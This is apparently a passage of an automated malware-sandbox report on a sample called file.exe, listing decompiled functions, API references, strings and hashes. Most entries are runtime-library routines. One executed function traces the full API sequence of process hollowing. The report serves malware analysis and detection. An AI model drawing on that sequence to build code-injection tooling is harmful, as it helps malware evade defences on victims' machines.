___sbh_free_block.LIBCMT ref: 004010E5
HeapFree.KERNEL32(00000000,0040102A,004A9540,0000000C,00402723,00000000,004A95A8,0000000C,0040275D,0040102A,00402543,?,004034AD,00000004,004A95C8,0000000C), ref: 00401115
GetLastError.KERNEL32(?,004034AD,00000004,004A95C8,0000000C,004065F7,0040102A,00402552,00000000,00000000,00000000,?,00404D25,00000001,00000214), ref: 00401126

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction ID: e3ad2658be1029a6c764e3d4744d99799671117a589aa33a50f22843976d0029
Opcode Fuzzy Hash: 588c8c0e739328054b6b1d81dd52dce8de64d9b0d652276143a2e915c3a22438
Instruction Fuzzy Hash: 3A01A231C01211AADF246FB29C4AB5E3AA4AF05729F10413FF654BA1E1DBBC89418A5D

Function 02302670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 023026DB
_memset.LIBCMT ref: 02302A30
_memset.LIBCMT ref: 02302AC0

Strings

D, xrefs: 02302AC8

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: D
API String ID: 2102423945-2746444292
Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction ID: 50d1ab2d2a2b3f642f4d8fe80a611ec0374003c95973297d4fb85a84837b66cf
Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
Instruction Fuzzy Hash: 90E15D71D00219ABDF24DFA0CD99FEFB7B8BF04704F144069EA09A6590EB74AA45CF64

Function 022FD8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 022FD8EA

Strings

(, xrefs: 022FDAE9
$, xrefs: 022FDAE2
, xrefs: 022FDADB

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: $$$(
API String ID: 2102423945-3551151888
Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction ID: 6c9e232503ec9a993c1368f2f3f9e513b12a9daaacdbb9efc0417ce02424283e
Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
Instruction Fuzzy Hash: 6A91BC71C00219AAEF24CFE0CC99BEEBBB5AF05308F244169D605772C4DBB65A48CF65

Function 0230A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0230A858
_memset.LIBCMT ref: 0230A869
_memset.LIBCMT ref: 0230A87A

Strings

p2Q, xrefs: 0230A882

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _memset
String ID: p2Q
API String ID: 2102423945-1521255505
Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction ID: d619ab9d09d8e07ee2f8f82fb551704e8c787f376bdd3df4038f4784e67698cf
Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
Instruction Fuzzy Hash: 39F0E578694790A5F7257B50BC267857D927B36B08F104049D1142E2E1D3FD234C6799

Function 0233FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0233FBF1

Part of subcall function 0232169C: std::exception::_Copy_str.LIBCMT ref: 023216B5

__CxxThrowException@8.LIBCMT ref: 0233FC06

Strings

TeM, xrefs: 0233FBFB, 0233FBE7
TeM, xrefs: 0233FBFE

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
String ID: TeM$TeM
API String ID: 3662862379-3870166017
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: a4689286905f39c5e7c3657fa67e6f07a65ede1215a649f47cdfded8a32d2fd7
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: E1D06775C0025CBBCB00EFA5D599CDDBBB9AA04344B008466AD5897241EA74A34D8F94

Function 022FD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON

Download Yara Rule

APIs

Part of subcall function 0231197D: __wfsopen.LIBCMT ref: 02311988

_fgetws.LIBCMT ref: 022FD15C

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: __wfsopen_fgetws
String ID:
API String ID: 853134316-0
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: c1ff68dda20fc66549f85e75c149b297375d149b4ef4bc2ff8adbc1f2abab41b
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 1591CE72D1021A9BCB65DFA4CC84BAEF7B5AF04304F140539EA19A7244E7B5AA04CFE1

Function 022FD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON

Download Yara Rule

APIs

__except_handler4.MSVCRT ref: 022FD77E
_malloc.LIBCMT ref: 022FD7B2
_malloc.LIBCMT ref: 022FD7C1
_fprintf.LIBCMT ref: 022FD815

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _malloc$__except_handler4_fprintf
String ID:
API String ID: 1783060780-0
Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction ID: 9c87fc3cf5649a5acefb7209b0f14ef4e6343a23307587915d40aeb034b9fdbf
Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
Instruction Fuzzy Hash: 34A160B1C00258DBEF25EFE4C845BDEBBB6AF14308F140068D50577291D7B65A58CFA6

Function 02312AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 02312B2E
__read_nolock.LIBCMT ref: 02312BFE
__filbuf.LIBCMT ref: 02312C21
_memset.LIBCMT ref: 02312C65

Part of subcall function 02315BA8: __getptd_noexit.LIBCMT ref: 02315BA8

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction ID: c6d9b515af66796e22a0b0869b20990f3e5d3d11f54ecfb3db89a668de3a405f
Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
Instruction Fuzzy Hash: 23519E70A0032A9FDB2D8F798C846AFB7B6AF40328F24C729ED35966D0D7719951CB44

Function 0040818E Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004081C2
__isleadbyte_l.LIBCMT ref: 004081F6
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00408227
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 00408295

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction ID: bcccdbddf6edb5e33cd8d9b62f485cae4394b5f7b34a4144a4775fce7ab85355
Opcode Fuzzy Hash: de10e71cb0db39fb3c86d3bea37f8cc85f6418dccf30b4602a10169084c52059
Instruction Fuzzy Hash: CA31BF31600245EFCB20DFA4CA849AA3BA5BF41350F1945BEE4A1AB2D1DB34DD41DB59

Function 02331359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0233137D

Part of subcall function 02331A9D: __fltout2.LIBCMT ref: 02331AC6

__cftog_l.LIBCMT ref: 023313A3
__cftoe_l.LIBCMT ref: 023313D5

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: e6e4e37199862566ae09b99871e1e6bdd1c17b47d26fad3ba414d84d51736180
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 8A014B3240014EBBCF235E88DC41CEE3F67BB19365B488515FA9D58930D336C6B1AB81

Function 023B7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 023B7A4B

Part of subcall function 023B8140: ___BuildCatchObjectHelper.LIBCMT ref: 023B8172
Part of subcall function 023B8140: ___AdjustPointer.LIBCMT ref: 023B8189

_UnwindNestedFrames.LIBCMT ref: 023B7A62
___FrameUnwindToState.LIBCMT ref: 023B7A74
CallCatchBlock.LIBCMT ref: 023B7A98

Memory Dump Source

Source File: 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_22f0000_file.jbxd

Yara matches

Similarity

API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
String ID:
API String ID: 2901542994-0
Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction ID: f1947c279238f01c1212ee6b0448dbacf865ee6bee871f67d7e2952f5c19d847
Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
Instruction Fuzzy Hash: F701D732100109BBCF23AF55CC01EEA7BBAEF89758F158014FE1865A21D732E961DFA0

Function 00406505 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00406511

Part of subcall function 00404D73: __getptd_noexit.LIBCMT ref: 00404D76
Part of subcall function 00404D73: __amsg_exit.LIBCMT ref: 00404D83

__getptd.LIBCMT ref: 00406528
__amsg_exit.LIBCMT ref: 00406536
__lock.LIBCMT ref: 00406546

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction ID: 43108a7cdec2e78bfd7abe1ba0d6f54392799be5e27be97f5d84fb845fd98235
Opcode Fuzzy Hash: a03eb32cb70a6cb46d4868c1b96f2a616ac8865678845852469dfd5624f2b2f3
Instruction Fuzzy Hash: C1F09631D407109BD710BB79A806B4D7790AF00728F11417FE841B72D6CB7C5911CA9E

Function 004A753B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(004BB098), ref: 004A7607
GetProcAddress.KERNEL32(00000000,004AD320), ref: 004A7644

Strings

, xrefs: 004A758D

Memory Dump Source

Source File: 00000003.00000002.1880576861.0000000000416000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1880473483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1880576861.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881667443.00000000004A8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881816736.00000000004AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1881905348.00000000004BE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID:
API String ID: 1646373207-3916222277
Opcode ID: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction ID: 7911a0c501cc7c5b72b9ded86d1bfadf4d461cded8068154810029e3547306ad
Opcode Fuzzy Hash: c7654210ef0568af384c7d2d1ae89fb6b1a96c87cdc3f7fb31b294fc344601fc
Instruction Fuzzy Hash: 95314B15D5C3C0DDE7019BA8BC057223F91EB2BB14F54056ADA958F6B1D3FA0548836F

Analysis Process: file.exePID: 5576, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	39
Total number of Limit Nodes:	8

Executed Functions

Function 021E0110 Relevance: 21.2, APIs: 14, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021E0156
CreateProcessA.KERNELBASE(?,00000000), ref: 021E0255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021E0270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021E0283
Wow64GetThreadContext.KERNEL32(00000000,?), ref: 021E029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021E02C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021E02E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021E0304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021E032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021E0399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021E03BF
Wow64SetThreadContext.KERNEL32(00000000,?), ref: 021E03E1
ResumeThread.KERNELBASE(00000000), ref: 021E03ED
ExitProcess.KERNEL32(00000000), ref: 021E0412

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
String ID:
API String ID: 3993611425-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 8f8595c73389df6e63443c037c18bc6dd2251603d2bf711dd88aff94af7a3ede
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 74B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB395D771AE41CF94

Function 021E0420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021E0533

Strings

d, xrefs: 021E0584
0, xrefs: 021E0492
mfoaskdfnoa, xrefs: 021E0520, 021E0523
saodkfnosa9uin, xrefs: 021E04DA

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 2e4ddab74d1773d267efb26786ed576d33cbc0bb982a63184a1bc8d27e709d51
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: 0C511570D48388DAEF11CBA8C849B9DBFB2AF15708F144058D5497F286C3FA5658CB62

Function 021E05B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 021E05EC

Strings

o, xrefs: 021E0600
apfHQ, xrefs: 021E05E2, 021E05E5

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 7463fc751c9a60c7151aae0d1882bc5f3bb7696099cee55123814b24a3b83969
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: C70121B0C0425CEEDF15DB98C9183AEBFB5AF45308F1480D9C4193B241D7B69B59CBA1

Function 021487C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 021487EE
Module32First.KERNEL32(00000000,00000224), ref: 0214880E

Memory Dump Source

Source File: 00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp, Offset: 02148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2148000_file.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 33fb588acd3b378809f3158a675b688b3cd23046bbe69b1ef01d79e52221ff13
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: DFF096352407116FD7203BF5AC8DF6E76E8AF49625F150538E64AA10C0DF70E8458A61

Function 02148485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 021484D6

Memory Dump Source

Source File: 00000004.00000002.2105224464.0000000002148000.00000040.00000020.00020000.00000000.sdmp, Offset: 02148000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2148000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9eb77dace97568a4ec19a04bd08e7b5b0e6d49971d86cac3b808992ca61a9dd8
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FB113C79A40208EFDB01DF98C985E99BBF5AF08351F068094F9489B361D775EA90EF80

Non-executed Functions

Function 022084AB Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 92
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 022084B1
_free.LIBCMT ref: 022084E2
_free.LIBCMT ref: 022084F5
_free.LIBCMT ref: 02208513
_free.LIBCMT ref: 02208525
_free.LIBCMT ref: 02208536
_free.LIBCMT ref: 02208541
_free.LIBCMT ref: 02208565
_free.LIBCMT ref: 02208581
_free.LIBCMT ref: 02208597
_free.LIBCMT ref: 022085BF

Strings

a\Roaming, xrefs: 02208577, 02208580, 02208587

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _free$ExitProcess___crt
String ID: a\Roaming
API String ID: 1022109855-3770683791
Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction ID: e5782622b2c7c14d15f77a6a87af8140a38c830d910738616b4ffc64b94fb6d4
Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
Instruction Fuzzy Hash: 0131A231910351DFCB215FD4FCC084E7BB6EB14324705862AE9086B2EACBB459D9AE96

Function 02206437 Relevance: 18.1, APIs: 12, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__calloc_crt.LIBCMT ref: 0220644E

Part of subcall function 02209636: __calloc_impl.LIBCMT ref: 02209645

__calloc_crt.LIBCMT ref: 02206472
_free.LIBCMT ref: 02206480
__calloc_crt.LIBCMT ref: 0220648E
_free.LIBCMT ref: 0220649E
_free.LIBCMT ref: 022064A4
__copytlocinfo_nolock.LIBCMT ref: 022064B3
__setmbcp_nolock.LIBCMT ref: 022064D4
_free.LIBCMT ref: 022064E2
___removelocaleref.LIBCMT ref: 022064E9
___freetlocinfo.LIBCMT ref: 022064F0
_free.LIBCMT ref: 022064F6

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
String ID:
API String ID: 1442030790-0
Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction ID: 5ecbf5b5424450b618bf2fe4065b4f90403c471f1f0f06449b6b9084e74b0db7
Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
Instruction Fuzzy Hash: 75219F31124701AEE7317FE5D881E2F7FEAEF41B60B508029F489594EFEB629560CE51

Function 02203F16 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 02203F51

Part of subcall function 02205BA8: __getptd_noexit.LIBCMT ref: 02205BA8

__gmtime64_s.LIBCMT ref: 02203FEA
__gmtime64_s.LIBCMT ref: 02204020
__gmtime64_s.LIBCMT ref: 0220403D
__allrem.LIBCMT ref: 02204093
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022040AF
__allrem.LIBCMT ref: 022040C6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022040E4
__allrem.LIBCMT ref: 022040FB
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02204119
__invoke_watson.LIBCMT ref: 0220418A

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: 1532c6c194396a6529e40d69a23c9986a11f2a2f2ec67afc0e4bedf18f299e79
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6871DA71A20717ABD714EEB9CCC1B5AB3EABF10324F148169E914E66D9EB70D940CB90

Function 0220650E Relevance: 16.6, APIs: 11, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__invoke_watson.LIBCMT ref: 02206547
__calloc_crt.LIBCMT ref: 02206598
__lock.LIBCMT ref: 022065AE
__copytlocinfo_nolock.LIBCMT ref: 022065BF
_wcscmp.LIBCMT ref: 022065F9
__lock.LIBCMT ref: 02206610
__updatetlocinfoEx_nolock.LIBCMT ref: 02206622
___removelocaleref.LIBCMT ref: 02206628
__updatetlocinfoEx_nolock.LIBCMT ref: 02206647

Memory Dump Source

Source File: 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_21e0000_file.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
String ID:
API String ID: 3432600739-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 294ccd2c7c5f2d01a9ad95f52dfaeec0882cfb562ae9083dcf6322effb2c4b9e
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: CC412732920309AFDB10AFE4D8C0BAE3BEABF04314F10842DEA14561DBCB799654DF51

Function 0222FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0222FC1F

Part of subcall function 0221169C: std::exception::_Copy_str.LIBCMT ref: 022116B5

__CxxThrowException@8.LIBCMT ref: 0222FC34
std::exception::exception.LIBCMT ref: 0222FC4D
